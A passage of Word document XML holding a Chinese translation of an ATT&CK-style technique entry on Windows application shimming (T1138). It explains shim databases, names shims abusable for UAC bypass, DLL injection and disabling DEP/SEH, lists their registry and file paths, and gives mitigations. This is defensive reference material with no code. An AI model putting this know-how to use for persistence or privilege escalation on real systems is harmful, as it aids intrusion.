      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA4E72" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应用兼容转接</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="38D88C26" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34903DC3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1138</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C9E2D38" w14:textId="4466EB46" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B398CD7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69DD0997" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC5DEDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已加载</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>动态链接库，系统调用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4503AB89" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66855E6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25846686" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用兼容性基础结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架（应用兼容</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>转接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是为了在操作系统代码库随时间变化时允许软件向后兼容。例如，应用兼容转接功能允许开发人员修改他们为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的应用（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需重写代码）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使这些应用也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>框架内</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序（或者更具体地说，导入地址表）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统之间创建了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“垫片”，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“缓冲区”，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用于实现兼容</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转接功能。执行程序时，会查询此缓冲区以确定程序是否需要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shim</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.sdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。如果需要，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shim</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库必要时会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooking</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来重定向代码，从而与操作系统通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DDDDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认安装程序（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sdbinst.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）安装的所有垫片</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表保存在以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315A0E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%WINDIR%\AppPatch\sysmain.sdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC9D506" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDEF44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义数据库存储在以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0E45C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD58367" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EC210" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了确保垫片的安全，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将它们设计为在用户模式下运行，这样它们就无法修改内核，而且您必须具有管理员权限才能安装它们。但是，某些垫片可用于绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（用户账号控制）（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RedirectEXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、将动态链接库注入到进程（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>InjectDLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、禁用数据执行保护（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DisableNX</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和结构异常处理（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>(DisableSEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）以及拦截内存地址（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ooking</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似，这些垫片可能允许攻击者执行多种恶意行为，如提升权限、安装后门、禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等防御措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507A9C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="35D0E8E0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3208A8C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="113EEB2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2AFFB8D0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A82B6D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73AC1071" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>微软发布了一个可选的补丁更新</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> -  KB3045645  - </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>它将删除</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sdbinst.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>auto-elevate</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标志。这样可以防止攻击者使用应用兼容转接</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7BCD3852" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F61BD7C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53AF012F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置更改为“始终通知”将在请求</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提升时为用户提供更多可见性。但是，由于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不断中断，此选项在用户中不受欢迎。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AF6903D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30081DBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
